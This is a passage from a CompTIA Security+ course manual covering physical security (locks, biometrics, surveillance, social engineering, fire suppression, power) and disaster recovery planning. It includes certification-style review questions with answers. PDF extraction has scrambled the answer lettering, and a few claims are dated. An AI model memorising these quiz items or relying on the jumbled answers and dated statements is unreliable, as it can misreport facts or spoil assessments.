or other secured entry point, he can enter a specific code that will notify security personnel and/or local law enforcement. Device locks Device locks are available to secure computer hardware and network devices. Without such locks, equipment can be easily moved or stolen. Cable locks are perhaps the best known of the device locks. They consist of a vinyl-coated steel cable that attaches PCs, laptops, and printers to desks, chairs, and other stationary objects. An example is shown in Exhibit 15-4. In addition to cable locks, other forms of device locks are available, such as switch controls that cover on/off switches, slot locks that cover spare expansion slots, port controls that block access to disk drives or serial ports, and cable traps that prevent the removal of cabling.
Physical security
155
Exhibit 15-4: Cable lock Multi-criteria locks Multi-criteria locks combine the strengths of two or more of the previously discussed lock types. A specific key or card may be required (something you have), along with a PIN number or password (something you know), and a thumbprint (something you are), to open the lock. As complexity increases, so does the cost and the security provided. The level of locking technology employed should be in proportion to the potential loss if someone were to breach that security. Surveillance Installing the various devices just discussed is only a partial answer to ensuring physical security. Another essential part is surveillance. Critical areas need to be watched to make sure that security policies are being followed and that unauthorized users are not trying to access the facility. Using security guards is one of the best ways to ensure physical security because guards are flexible, provide good response, and are an effective deterrent. Various intrusion detection systems and physical protection measures require human action. Guards can be placed permanently on post at vital entrances, or they can patrol the facilities to ensure that all is secure. Security guards should have a very well-defined process in place and should be fully trained on how to respond in an emergency. By combining the security mechanisms previously mentioned with security guards, an organization can optimize its physical security. Guard dogs are very effective at detecting intruders because dogs have such highly refined senses of smell and hearing. Guard dogs are also very effective deterrents just because a dogs barking will usually chase someone away. One of the challenges with using guard dogs is training them to distinguish between authorized and unauthorized users. In smaller organizations this is less of a challenge than in larger organizations with hundreds or more employees. Most of the time, guard dogs are used in tandem with security guards to present a threat to potential attackers. Physical surveillance, such as that provided by guards and guard dogs, is further enhanced by the use of visual recording devices. Closed-circuit television cameras can be placed throughout a facility and can be monitored at a central location. These cameras record all activity that takes place within critical areas and allow security personnel to assess whether or not an area is being compromised.
156
CompTIA Security+ Certification Fencing Fencing can prove to be a very effective physical barrier because it can control access to entrances. Of course, the cost of fencing is directly related to the height used, the quality of the material used, and the quality of the fence installation. Therefore, a cost-benefit analysis is necessary when youre deciding on the type of fence to be used. Fences three to four feet high are used primarily to deter casual trespassers, while fences eight feet high with barbed or razor wire indicate that the facility is serious about securing the physical perimeter. Lighting Lighting can be used to deter intruders while providing a safer environment for personnel. The National Institute of Standards and Technology advises that critical areas should be illuminated eight feet high and two feet out to ensure the safety of personnel and visitors. The actual lighting types can vary and may include flood lights, street lights, and lights that are easily focused.
Physical security Do it!
157
A-1:
Discussing physical deterrents
Exercises
1 Programmable locks that use a keypad for entering a personal identification number or password are called: A B
C
Preset locks Slot locks Cipher locks Device locks
2 Locks that prevent the removal of computer hardware and network devices are called: A B C
D
Preset locks Slot locks Cipher locks Device locks
3 Critical areas should have illumination: A

B
Three feet out and eight feet high Two feet out and eight feet high Three feet out and six feet high Two feet out and six feet high
C D
4 Surveillance includes security guards, guard dogs, and visual recording devices. List one pro and one con for each. Security guards
Pro: Flexible, provide good response, effective deterrent Con: Expensive, require training
Guard dogs
Pro: Effective at detecting intruders, good deterrent Con: Difficult to train to be able to distinguish between authorized and unauthorized users
Security cameras
Pro: Can be distributed throughout facility and monitored at a central location Con: Limited field of vision, can be disabled with power outage
158
Biometrics
Explanation Biometric locks are based on the substance of the person attempting to gain entrance. Thumbprints, handprints, retinal scans, and voice prints are among the many biometric criteria that can be used to positively identify a person. Biometrics verifies a users identity by a unique personal characteristic. Because biometrics is such a sophisticated technology, the cost of implementing a biometrics system can be quite expensive. Biometric systems work by scanning the personal characteristic of a user and comparing that to a previous record that was created when the user was hired or added to the system. There are many types of biometrics systems that examine different attributes. With each type, a user must enroll with the organizations security department and have his or her physical characteristic scanned, registered, and verified. Following are some of the various biometrics systems that can be used to identify a person: Fingerprints Palm prints Hand geometry Eye scans Signature dynamics Voice prints Fingerprints and palm prints have long been recognized as valuable identification mechanisms. Every individuals finger or palm print is a unique pattern of ridges and swirls that identify that person. As a user places his or her finger or palm on an optical scanner, the finger or palm is scanned and compared to an archival file of fingerprints or palm prints. If there is a match, that person is granted access to the facility. Hand geometry scanners are fairly similar to fingerprint and palm scanners in that they scan the hand of a user. In this instance, instead of looking for ridges and swirls, the scanner measures the length and width of the hand and fingers. This mathematical process is then compared to archival data, and if a match occurs, the person is granted access. Since the 9/11 attack, airports have stepped up the implementation of this type of technology to increase security in selected airports. Long thought to be science fiction, eye scans have become a common type of biometric validation. Retina scans compare the patterns of blood vessels on the surface of the retina to the archival database, and iris scans use the variations in color, rings, and furrows of the iris to verify identity. Wells Fargo has experimented with the installation of iris scanners at ATMs to increase security. This technology will most likely become more prevalent as time goes on. Signature dynamics and voice prints provide other forms of biometric verification. The motions performed when writing a signature are unique to each individual, so this data can also be used for identification purposes. A voice print identifies an individual by the inflection, pitch, and intonation of his or her voice. With both technologies, this data is compared to the archive for verification. A downside to this method is that if a person loses his or her voice or cant speak, the person will be locked out. However, secondary verification can be used to counter this problem.
Physical security
159
Although biometric techniques theoretically positively identify an individual, they are known to have both false positives and false negatives. As new security technologies are developed based on biometrics, methods for fooling the systems quickly follow. Synthetic gel-filled structures called gummy fingers can fool fingerprint, palm print, or hand geometry readers. Signature forgery can be used on a signature reader just as on a printed check; however, signature dynamics assess more than just the final shape of the signature and are more difficult to fool. New technologies that are more difficult to fool are being developed. A promising method is based on DNA analysis, which can almost conclusively link a presented sample with a recorded sample. Unfortunately, that does not prevent a malicious person from obtaining genetic material from an authorized user and presenting it to the reader. Of course, obtaining such a sample is a difficult task in itself. Do it!
A-2:
Discussing biometrics

1 Which of the following is an example of a biometric device? A B
C
Single-factor authentication Multi-factor authentication Voice print Proximity badge
2 A retinal scan is a scan of the_________.

A
eye face voice palm
B C D
3 What factors can lead to false negatives on a biometric scan?

Gummy fingers can fool fingerprint, palm print, or hand geometry readers. Signature forgery can be used on a signature reader. Genetic material stolen from an authorized user can be presented to a reader. Altering facial characteristics, such as growing or shaving a beard, can fool a facial
scanner.
1510 CompTIA Security+ Certification Social engineering

Explanation To gain access to a facility, staff members or external parties must provide proper identification. The identification process can occur by using passwords or personal identification numbers, identification cards, or biometric systems. When youre selecting an access control mechanism, its important to understand the impact a social engineering attack can have. Social engineering is a hackers manipulation of an authorized user (or users)and the natural human tendency to trustin order to get unauthorized access to a system. One way an unauthorized user can gain access to critical information is to pretend to be an authorized user. For example, a person may call someone from the technology staff and claim to be a company employee who has lost his or her password. If the staff member gives the password information to the caller without verifying the callers identity, then critical information and equipment can be put at risk. Another common security breach is what is known as piggybacking. Piggybacking occurs when an unauthorized individual gains access to a facility by following closely behind an authorized employee. This type of breach can be mitigated by stationing a security guard close to the entrance or by training employees on proper security practices. By implementing sound technical controls and following well-defined security policies, companies can minimize the risk of such attacks.
Physical security Do it!
1511
A-3:
Discussing social engineering

1 What kind of attack is used to persuade a user or administrator to give out information or access? A
B
DDOS attack Social engineering attack Syn attack All of the above
C D
2 What is piggybacking?
This is a security breach in which an unauthorized person closely follows an authorized employee into a building.
3 How should you securely dispose of sensitive documents? A

B
Throw in the recycle bin. Use a shredder. Tear the document into pieces. Cross out private information and throw the document away.
C D
4 How should you securely dispose of electronic media that contain confidential information? (Choose all that apply.) A
B C D
Throw in the dumpster. Encrypt the media; then throw in the dumpster. Overwrite the contents with zeros if the media are erasable. Physically destroy the media .
5 How can you prevent piggybacking? (Choose all that apply.)

A
Train employees on proper security practices. Install a biometric scanner at the entrance. Install a cipher lock at the entrance. Station a guard close to the entrance.
B C
D
Topic B: Environment
# 5.1 Objective Understand the application of the following concepts of physical security Environment Wireless Cells Location Shielding Fire Suppression
Environmental considerations
Explanation Environment refers to the surroundings in which the computers and other networking equipment reside. If the environment is not secure, data and equipment can be damaged or subjected to malicious attacks. The following factors should be considered: Building location and construction Ventilation Power supply Shielding Wireless cells Fire suppression
Building location and construction

Location is one of the most important criteria in situating a critical data or network facility. When choosing a location for an operations facility, managers should consider the following: Visibility Accessibility Propensity for environmental problems Many organizations place their facilities in areas where the buildings will be unnoticeable or indistinguishable from other buildings in the area. Also popular are areas with mountainous terrain that can block electrical signals coming from equipment within the facility. Such terrain can counteract any malicious eavesdropping. The surrounding area should be analyzed based on crime statistics, location of emergency response facilities (such as police, fire, and medical), and any other potential hazards, such as factories producing explosive or combustible materials. Other factors in selection are the impacts of traffic and the location of major transportation arteries, including airports, train stations, and freeways. The site should have adequate access for the smooth entrance and exit of personnel and emergency response vehicles, but be restrictive enough to maintain a secure environment.
Physical security Construction
1513
Equally as important as location when choosing a site is the composition of the construction materials. Different materials yield different levels of protection from events such as storms, fires, and earthquakes. Whether wood, steel, or concrete is used in the construction of the building depends on what the building is going to be used for. A site used for daily operations has very different needs and legal requirements than does a site used for storage. When youre constructing or selecting a facility, its important to evaluate the fire rating and how well-reinforced the walls are. Another important consideration is the security of the doors: whether they are easily forced open; where they are located; whether they have glass; and whether the glass is shatterproof or bulletproof. Ceilings should be assessed for the combustibility of the material used, for load and weight bearing ratings, and for the ability to install drop ceilings for any necessary cabling. A facilitys windows should be translucent or opaque to deter any unwanted observation. They should also be shatterproof, if not bulletproof, and wired for alarms. It may even be prudent to have a facility with no windows, especially if the security policy dictates. When youre assessing a facility, its important to verify the location of shutoff valves for water and gas lines and the location of fire detection and suppression devices. Cable installation Physical security is impossible for many types of network facilities. For instance, wide area networks often employ fiber-optic cabling that may run hundreds or thousands of miles, and telephone cables are run on poles along the side of public streets. Although telephone cables are installed in a right-of-way, they are rarely protected by fences or other physical structures because of prohibitive cost. These cables may be buried under agricultural fields, and many major inadvertent disruptions have been caused by the unfortunate selection of a digging site with a backhoe. Because complete physical security is difficult in these environments, controlling organizations often implement physical security that limits the possibility of any externally caused accidental breaks and that provides immediate notification that a break has occurred or is about to occur. Running communications media along other structures, such as railroad tracks, may limit the potential for breaks. This was the common location for the original telegraph wires. In 1985, Williams Companies pioneered the placement of fiber-optic cables inside decommissioned pipeline structures that most backhoe operators try to avoid. Also, underground telephone trunks are sometimes bundled inside a sheath that is filled with compressed gas. The pressure is monitored at the central office; a substantial loss of pressure indicates that the outer protective coating has been breached. This monitoring often allows maintenance to be done on the trunk before any subscribers are aware of the difficulty.
Shielding
Common network cabling is very sensitive to electromagnetic interference (EMI) and radio frequency interference (RFI). Only properly shielded wires should be used in local area networks. Choose the best wiring that your budget permits and your environment requires. While high-quality UTP cabling does provide some protection, and coax cabling has even better resistance, fiber optics are totally immune to electrical interference.
1514 CompTIA Security+ Certification Wireless Cells

Wireless technologies are an important addition to local area networks, liberating them from cabling constraints. Wireless technologies use the IEEE 802.11 standard and a common frequency band (typically 2.4GHz). Eliminating the wired connection does not lessen the vulnerability of these networks to malicious attacks, however. The attacker does not need to be physically close to get access to the LAN. Wireless devices can transmit signals as far as 500 meters, enabling anyone outside the building to eavesdrop. Cell phone technology extends the range even further. Another concern is interference from cordless phones, microwave ovens, medical equipment, military communications equipment, and other such devices. Consequently, establishing a wireless network needs very careful planning to protect it from intrusion.
Power failures
Power failures can be devastating to a network facility. If electricity services to a major data center or network operations center are disrupted, entire business operations units can be affected adversely. This makes efficient and effective power backups an absolute necessity. There are two main methods to protect against power failure: an uninterruptible power supply (UPS) and backup sources. An uninterruptible power supply uses batteries to maintain power until the primary power supply is restored. The capacity and size of these batteries varies from unit to unit. UPS units can operate on a standby basis or as online systems. Standby units stay inactive until a critical power event occurs. The system has sensors that can detect fluctuations and respond accordingly. Online systems use AC line voltage to charge a bank of batteries. When in use, the UPS changes the DC output from the batteries and regulates the voltage as it powers computing devices. The capacity and size of a UPS should be related to how critical the devices being powered are to the network. If they are vital networking pieces, the UPS should have considerable battery power to maintain critical networking function until power is restored. Just as important as a UPS are backup power sources. If a considerable outage occurs, a backup power source, such as a generator, may be needed. Again, the size and type of an appropriate generator depends on whats needed at the facility and should be directly correlated to just how important the equipment in the facility is. Telephone service is known to be extremely reliable, running after major disasters and during long-term power outages. Telephone companies employ multiple layers of power redundancy at the central office switch, which powers most of the connected telephones. A common implementation is for AC power from the local power-generating plant to be run through an inverter to create 48 volts of DC power, which is injected into large acidcell batteries. The batteries are connected to the switch, providing a clean source of energy that is shielded from the fluctuations of common AC power sources. The batteries are selected and maintained so that there is sufficient time to page an engineer, have that person arrive at the central office, determine that a power outage is due to loss of central power, and start up a large diesel generator. The generator replaces commercial power and can keep the batteries charged as long as the phone company can provide diesel fuel.
Physical security
1515
The following procedures can help protect computing facilities from various power issues: Use surge protectors to help protect equipment from voltage fluctuation. Follow proper shutdown and power-up procedures to ensure that computing devices are not damaged. Shield long cable runs to help control the impact of electromagnetic interference. Avoid fluorescent lighting. Properly ground all equipment and racks. Do not daisy-chain power strips and extension cords together to create longer extension cords. If a longer cord is needed, purchase one.
Fire suppression
Fires can seriously disrupt operations and cause large amounts of damage to facilities and should be considered a very serious threat. Its also possible that fire suppression materials may cause more damage than the fire that was extinguished, making suppression selection critical. There are national and local standards that must be met for facilities to operate. Fire detection response systems come in many forms. There are manual fire-alarm pulldown devices, as well as automatic sensors that react to smoke or heat or both. A fire detection response system is usually used with an automatic fire suppression system that uses Halon gas, carbon dioxide, water, or soda acid. The following table lists the major types of fire and the best way to suppress them.
Type of fire Class A: Common combustibles Class B: Flammable liquids Class C: Electrical Elements of fire Wood, paper, etc. Petroleum products and coolants Electrical equipment and wiring Suppression methods Pressurized water or soda acid. Halon (or replacement) gas, carbon dioxide, or soda acid. Nonconductive chemicals: Halon (or replacement) gas or carbon dioxide.
When wood or paper ignites, the primary cause for the fire is an increase in temperature. Water is used to put out these types of fires because it effectively lowers the temperature of the fire and then saturates the object to stop a flare-up from occurring. Carbon dioxide and soda acid smother the fire by removing oxygen, which is vital for fires to burn. Pouring water on a petroleum fire or electrical fire will not have much effect because the fire is not caused by heat. Using carbon dioxide or soda acid has an effect because they eliminate the oxygen fueling the fire. Halon gas has been used for fire suppression because it interferes with the chemical process that creates the fire. However, Halon has chemicals that deplete the ozone layer and that can be dangerous to humans in concentrations greater than 10%. For this reason, the use of Halon has been banned, and the Environmental Protection Agency has approved a list of replacements, including FM-200, NAF-S-III, Inergen, Argon, and Argonite.

Fire suppression systems Two primary types of fire suppression systems are available: fire extinguishers and fixed systems. Fire extinguishers are portable systems and are classified by the types of fires they put out. The more popular types are AB, BC, and ABC, which can extinguish multiple classes of fires. Fixed systems typically combine fire detectors with automatic fire suppression systems. These systems use either water sprinklers or fire-suppressing gas to extinguish flames. Wet pipe systems react immediately to fire detection, spraying water over the entire area. There is little you can do to protect the computer equipment in the meantime. Dry pipe systems hold the water back by a clapper valve, allowing time to shut down the system if you can personally contain the fire. Pre-action systems combine both wet-pipe and dry-pipe technologies. This system emits an alarm before it distributes water. This type of sprinkler system is commonly installed in electronic data centers and computer rooms. Gas discharge systems use Halon (or a replacement) or carbon dioxide to suppress the fire without damage to computers and other electronic devices. Extensive data centers and critical centralized computing facilities can be constructed inside fireproof rooms. If a fire starts in adjacent spaces, its unlikely to spread to the room with the most critical systems before it can be extinguished. If a fire starts within the data center, its most often extinguished with a gas system that will not cause damage to the supported systems. By using fire suppression and detection mechanisms, organizations can minimize the risk of damage or loss due to fire. While the mechanisms play an important role, just as important is proper training of all employees on appropriate fire prevention techniques.
Natural disasters
Another issue to keep in mind when considering the physical security of a facility is how prone the facility and surrounding areas are to natural disasters such as floods, lightning, or earthquakes. If the area is highly susceptible to such problems, it may make sense to locate the facility elsewhere. If the facility is already operational in such an area, safeguards such as flood drainage, lightning rods, and reinforced buildings should be evaluated. Do it!
B-1:
Discussing environment

1 When selecting a facility location, which of the following is the least important? A B
C
Natural disasters Crime rate Proximity to an airport Proximity to fire station
Physical security 2 Electrical fires are classified as: A B

C
1517
Class A fires Class B fires Class C fires Class D fires
3 What type of a UPS system uses AC voltage to charge batteries and converts the DC output from the batteries to regulate voltage? A B C
D
Monitoring system Wireless system Standby system Online system
4 What is an effective technique in ventilation systems that force air outward from a facility to help guard against dust and other pollutants? A B C
D
Port controls Piggybacking Negative pressurization Positive pressurization
5 How does Halon fight fires? A B C

D
It eliminates oxygen. It reduces heat. It reduces the fuel intake of the fire. It disrupts a chemical reaction taking place.
6 A carbon-dioxide fire suppression mechanism is best for which of the following?

A
Electrical fire Paper fire Trash can fire Open area fire
B C D
Unit summary: Physical security

Topic A In this topic, you examined the various types of access control mechanisms, such as locks, surveillance and biometrics, that require evaluation when a facility is being designed. You also learned that the only deterrent for social engineering is employee education and awareness. In this topic, you learned the importance of location and construction materials when constructing or selecting an operational facility. You learned that wired networks must be properly shielded against electromagnetic and radio frequency interference, and wireless cells must be carefully positioned so as to mitigate eavesdropping. Finally, you learned how planning for power failures, fire, and natural disasters can help safeguard against catastrophic loss of data.
Topic B
Review questions
1 Which of the following items are not forms of physical protection? A Identification card B Biometric device
C
Access list
D Security guard 2 Which of the following are types of wireless proximity devices? A Biometric devices and access control devices B Swipe cards and passive devices C Preset code devices and wireless devices
D
User-activated devices and system-sensing devices
3 What is a cipher lock? A A lock that uses cryptographic keys B A lock that uses a type of key that cannot be reproduced C A lock that uses a token and perimeter reader
D
A lock that uses a keypad
4 What does door delay mean?

A
After a door is opened for a specific period of time, the alarm goes off.
B The door can be opened only during an emergency. C The door has a hostage alarm capability. D The door has supervisory override capability.
Physical security 5 Technical controls are divided into which categories? A Personnel access controls B Surveillance C Ventilation D Power supply E Fire detection and suppression
F
1519
All of the above
6 UPS stands for uninterruptible power supply. True or false?

True
7 Standby is a type of UPS that stays active until a critical power event occurs. True or false?
False. Standby units stay inactive until a critical power event occurs.
8 A cable trap is a device that locks and prevents unauthorized unplugging of cables from computer devices. True or false?
True
9 Cipher locks are locks that secure computer hardware and network devices. True or false?
False. Cipher locks are programmable locks that use a keypad for entering a personal identification number or password.
10 The capacity and size of a UPS should be related to how critical the devices being powered are to the network. True or false?
True
11 Social engineering is a hackers manipulation of an authorized user (or users)and the natural human tendency to trustin order to get unauthorized access to a system. True or false?
True
12 Cipher locks offer which options that make them a better choice than preset locks? (Choose all that apply.)
A B C D E
Door delay Key override Master key ring Hostage alarm Master delay
13 Wireless Internet readers are magnetic card readers that can sense a card within a certain distance. True or false?
True
1520 CompTIA Security+ Certification Independent practice activity

Optel Ltd. specializes in the research and development of ultrasound devices. One of the companys biometric projects is a fingerprint recognition device that would enable identification based on finger ridge patterns. 1 Download the Fingerprint Synthesis program to C:\Security, according to your instructors directions, and run it on your computer. Extract Fingerp1.exe from the fingdemo.zip file you downloaded. Its a very simple program that doesnt require an installation. Note: The software is located at www.optel.pl/software/english/synt.htm. 2 At the Optel Web site (www.optel.pl/index_en.htm), read the accompanying article called Software for fingerprint recognition, and then experiment with the application by changing parameters and clicking on the Create Finger button. 3 Double-click Fingerp1.exe to start Fingerprint Creator. Create and save five different fingerprints as .bmp files (name them test1.bmp, test2.bmp, etc.). 4 Download and install VeriFinger 4.2 Demo Version according to your instructors directions. Use the default options for installation. Note: The software is located at www.neurotechnologija.com/verifinger.html. Follow the links to the VeriFinger 4.2 Demo Version. 5 Launch the VeriFinger program. 6 Choose Mode and verify that Enrollment (first option) is the active mode. 7 Choose File, Open and then navigate to the directory containing the fingerprint .bmp files you created with Fingerprint Creator. 8 Select the first four .bmp files and click Open. 9 Click OK to enroll. 10 Choose Mode, Identification to activate Identification mode. 11 Choose File, Open and then navigate to the directory containing the fingerprint .bmp files that you created with Fingerprint Creator. 12 Select one of the first four.bmp files, and click Open. Click OK. When you open a file in Identification mode, the print is analyzed against the enrolled print and the results display in the Identification results portion of the window. 13 Zoom in and analyze the print on the upper-right side of the screen, comparing it to the original print on the left side. What is being identified in the upper-right window? Compare these points to the graphic on the left. 14 Choose File, Open and select the last .bmp file, and click Open. Click OK. Observe what happens. The file is opened, but identification results dont display because the file hasnt yet been enrolled.
161
Unit 16 Disaster recovery and business continuity

A Develop a disaster recovery plan. B Describe how to implement fault tolerance
and redundancy to ensure business continuity.

C Create and adopt a well-defined security
policy, human resources policy, and incident response policy.

D Successfully manage access to the
information stored on a network.
162
Topic A: Disaster recovery

# 5.2 Objective Understand the security implications of the following topics of disaster recovery Backups Off Site Storage Secure Recovery Alternate Sites Disaster Recovery Plan
Disaster recovery plan

Explanation A disaster recovery plan specifies the resources, actions, and data required to reinstate critical business processes that have been damaged or disabled because of a disaster. The purpose of developing a solid disaster recovery plan is to allow the business to continue through whatever catastrophic event might occur. The recovery plan must include contingencies for the fact that the business will have to continue to operate through the disaster or attack and remain in operation until the recovery plan can be completely implemented. Recent history has proven the absolute necessity of disaster recovery efforts. When disaster strikes, an organization can be rendered ineffectual and unable to provide its critical business functions. For example, when the terrorist attacks of September 11, 2001, took place in New York City, the Australian Academic Research Network reported that packet loss on its MCI link went from 0% to 4% at 13:39:25 GMT, then to 100% at 14:06:11 GMT, to 96% at 14:07:48 GMT, and back to 0% at 14:29:07 GMT. This data matches the time period when the south tower of the World Trade Center collapsed. What this illustrates is the catastrophic loss of MCIs critical business function and their ability to restore connectivity in less than half an hour. MCI was able to do this by having a well-tested, comprehensive disaster recovery plan in place.
Backups
All computing hardware and media will fail. The issue is only one of timing. An essential part of any disaster recovery plan for any size organization is data backup. Backup of all mission-critical data is vital to allow personnel to restore files and application software and continue business. The method and schedule of data backups performed must be sufficient to restore those processes deemed critical. An effective backup strategy should take into account the following key issues:
163
What data should be backed up? Your company may separate its data into mission-critical information and data that does not change over time, such as operating system and application files. Full backups will back up all files selected on a system. A full backup will clear the archive bit of each file after every session. Incremental backups will save only those files that have been modified since the previous backup. The archive bit is cleared on those files that are backed up. This method is the fastest to back up but the slowest to restore, because you need to restore the last full backup and every incremental backup after that. Differential backups will save only those files that have been changed since the last full backup. The archive bit is not cleared on those files backed up, so each differential backup is larger than the previous. You need to restore only the last full backup and the most recent differential. How frequently should the backups be run? Backup schedules will take into account the importance and stability of the data. Data that is changed on a daily basis, such as a transactional database, will be backed up daily. Other files, such as program files, that dont change often, can be backed up on a lighter schedule, such as weekly. What is the backup medium? The amount of data to be backed up will affect the type of medium you choose. The most common type of backup media is magnetic tape. It can accommodate a large amount of data, offers relatively inexpensive storage, and is fast. Other media include optical disks, Zip disks, and removable hard drives. Are the backups manual or automated? Manual backups require an attendant to switch media once full or to respond to an error. If your backups are unattended, make sure that your mediums capacity is sufficient to store the entire contents of the backup. Jukebox devices, which use robotic autoloaders to switch tapes, resolve the issue of backing up multiple volumes of data. How are backups verified? Verification tests the data stored on the backup against the original data to ensure that the copy is an exact image of the original. Although verification prolongs the backup process by twofold, its the only way to ensure a good backup. In addition, you should regularly test the backup devices by performing test restores. How long are backups stored? Media rotation and retention determine the amount of time a backup should be retained before the media are reused or destroyed. Magnetic tapes deteriorate over time and suffer wear and tear with reuse. Develop a media rotation scheme that is consistent with your companys requirements, and adhere to it. Who is responsible for backups? Your backup plan should document who is responsible for performing the backup operators functions, including changing tapes, sending tapes offsite, performing restores, and examining log files. The plan should also identify the fallback person if the primary operator is unavailable. Where are backups stored? A copy of all data should be stored at a site separate from the location of the production network and systems to ensure that destruction of the facility does not compromise all data. When an organization has more than one main office, data should be duplicated and stored at more than one site to ensure business continuity.
164
CompTIA Security+ Certification Media rotation schemes Several rotation methods are available to provide the ideal balance between cost and reliability. The son method uses the same backup media on a daily basis. This method does not allow for archiving, and you are limited to your last backup for a restore. If the backup is damaged, there is no means to restore the data.
You may want to illustrate the rotation schemes for father-son and grandfather-fatherson methods on the board.
The father-son method combines a full backup and several differential or incremental backups each week. An incremental or differential backup is performed every day of the week, except Friday or the weekend, when a full backup is performed. This method allows you to retrieve files archived from the previous day, by using the weekly full backup and then restoring the incremental or differential backup(s). The grandfather-father-son method is most commonly used. This method uses the father-son backup on a weekly basis, with the weekly full backup held for an entire month. At the end of the month, a special monthly backup is made, which is kept for one year. This method allows you to archive files for up to a year. Remote backups In many backup solutions, communications between a client and server are an open conversation, which means that every file being backed up over the network is sent in clear text. If the production network has high security integrity and a secure firewall in place, this should not be a problem. If the communication is taking place over a WAN connection or outside of the firewall, a virtual private network (VPN) can be used to protect the integrity of the data. Another option is to encrypt the data on the server, so only authorized users can decrypt the data into a usable format. Even a backup that takes place in an open conversation would then be protected.
Offsite storage
Organizations with extensive business-critical data processing and storage requirements should also assess the need for offsite operational facilities. If computer and data access are absolutely necessary for business function, then offsite facilities might be one of the most important components of an effective disaster recovery plan. Offsite facilities allow the business to resume operations if the physical plant suffers a devastating loss, as in the case of the World Trade Center disaster. The three main types of offsite facilitieshot site, warm site, and cold siteare outlined in the following table.

Site type Hot Site Description Fully configured and ready to operate within a few hours of disaster. Can support short- or long-term outage. Is flexible in its configuration and options. Partially configured with some computing equipment. Provides the facility and some peripheral devices, but not a full configuration. Supplies basic computing environments, including wiring, ventilation, plumbing, and flooring. Advantages Ready for operation within hours. High availability. Flexible configurations. Annual testing available. Exclusive use. Disadvantages
165
Very expensive (can be more than double the data-center costs).
Warm Site
Less expensive. Usually exclusive use. Available for long time frames.
Not immediately available. Operational testing usually not available.
Cold Site
Relatively low cost.
No hardware infrastructure. Not immediately available. Operational testing not available.
One option that many organizations pursue is to sign a reciprocal backup agreement with another organization; this means that two parties back up and store each others data. This is a very cost-effective (though not necessarily reliable) way to keep data in separate locations. Another option is to use one of a myriad of Internet-based backup services or various service bureaus that provide the data backup service for a fee. The most expensive, but perhaps most secure, way to back up data is to build and manage a completely redundant in-house network over which the organization has complete control. This level of redundancy may not be necessary for all businesses, but businesses that use the network to address customers, process orders, and keep track of secure transactions should take action to have a hot system available should the need arise. Without such a system, the business might not be able to continue through the disaster recovery process.
Secure recovery
The backup plan should include procedures for proper restoration of the data, should it become necessary. A backup cannot be relied upon until personnel have attempted to actually restore it to a system. Organizations should conduct incident training in which an actual copy of a sample systems data is restored to a backup or secondary system. Spot-checking the readiness to restore systems both checks the effectiveness of backup methods and keeps personnel trained for a quick restore of the system.
166
CompTIA Security+ Certification Alternate sites If disaster strikes and you have to recover from an offsite location or alternate site that was previously configured for just such a situation, things can nonetheless get sticky. If at all possible, practice recovery procedures in such a scenario. Develop a plan that outlines what exact steps need to be taken to recover using the alternate site and then carry out the plan. At the very least, make sure that key personnel in your organization are comfortable with the roles they would have to play and actions they would have to take in the event of having to use an alternate site to recover after a disaster. Alternate sites should preferably not be in close proximity to your organization's current location, but should still be relatively easily accessible, preferably within driving distance. Say, for example, a hurricane destroys your town. If your alternate site is in the same town, it was probably destroyed, too, and wouldn't be of any use to you anymore. The hurricane may, however, not have touched areas a few towns over or the next closest metropolitan area. Of course, it's impossible to identify a perfect location as one cannot predict the nature or magnitude of a disaster. However, when deciding on a location for an alternate site, distance to the current location should be a balance between practicality and likelihood of the physical extent of a disaster. A general rule to consider is to place an alternate site a minimum of 50 km away. If you live in areas prone to Earthquakes, don't place your alternate site somewhere on or near the same fault line as the one your current location is nearest.
Disaster recovery plan

The best way to ensure that a business can survive an IT emergency is for that business to have a well-developed and specifically documented recovery plan. An effective disaster recovery plan should include the following documents: A list of the covered disasters A list of the disaster recovery team members for each type of situation and their contact information A business impact assessment A business continuity plan (contingency plan) System documentation Identifying threats A disaster recovery plan defines the resources, actions, and data required to reinstate critical business processes that have been damaged or disabled because of a disaster. When youre planning disaster recovery efforts, its important to understand the nature of the disaster. Potential threats are classified into five broad categories: Human-induced accidentsLoss of power, transportation accidents, chemical contamination, etc. NaturalFire, flood, earthquake, tornado, etc. InternalSabotage, theft, employee violence, etc. Armed conflictActs of terrorism, civil unrest, and war. ExternalHacking, unauthorized use, industrial espionage, etc. These types of situations, luckily, do not happen too often. A business is more likely to encounter business interruption due to employee error or equipment failure.
167
To successfully prepare for system failures, an organization must identify potential threats and analyze what needs to be achieved in order to continue operating as though nothing had happened. Critical information and equipment need to be identified, and procedures must be documented for system and data restoration. After these activities have taken place, network managers can determine how best to protect or restore the mission-critical information systems. A successful disaster recovery plan must rely on thorough planning and testing, and must include provisions for business continuity, without which it would likely fail. Disaster recovery team The disaster recovery team should include members of senior management, members of the Information Technology department that will perform the assessment and recovery, representatives from facilities management, and representatives from the user community affected by the event. Each department should be represented because each will have its own objectives and priorities during a crisis. Each team member must know his or her function, which could include coordinating other department personnel, contacting outside emergency agencies, or summoning equipment and service vendors. The most important step in managing potential crises is to have the proper team assembled, trained, and ready to respond at a moments notice. Business impact assessment
Explain to students that they will use the business impact assessment to determine how much to spend on the plan, based on the costs of recovery vs. the costs of downtime. In other words, if the company will lose $100,000 per hour of downtime in a disaster, how much will it cost to have a plan that will restore operations in less than an hour? If the costs are $250,000 to restore operation in an hour but only $100,000 to restore operations in two hours, then perhaps the plan should be geared toward a two-hour recovery.
The next step in the disaster recovery planning process is performing the business impact assessment. The business impact analysis will identify your most critical functions and how they would be affected by a disaster. The time frame of the recovery process is the responsibility of the organization. The time frame should reflect the cost of the failure in terms of loss of revenue, cost of the recovery vs. the cost of the lost revenue, and any acceptable workarounds. Once the allowable outage time has been determined, the feasibility and cost of the recovery must be determined. These issues should be studied carefully, because the expense of recovering from the disaster may be much smaller than the actual loss of revenue and reputation that a company could suffer from not having a solid continuity plan. Some organizations find it helpful to categorize various business functions into categories. For example, the Massachusetts Institute of Technology has published its Disaster Recovery and Business Resumption Plans, which include the following categories: Category I CriticalMust be restored to maintain normal processing. Category II EssentialWill be restored as soon as resources become available, not to exceed 30 days. (This period is specific to MIT. The length of time in which an essential system should be restored depends on the relative business loss of not restoring it for that time.) Category III NecessaryWill be restored as soon as normal processing is restored; data must be captured and saved for subsequent processing. Category IV DesirableWill be suspended for the duration of the emergency.
168
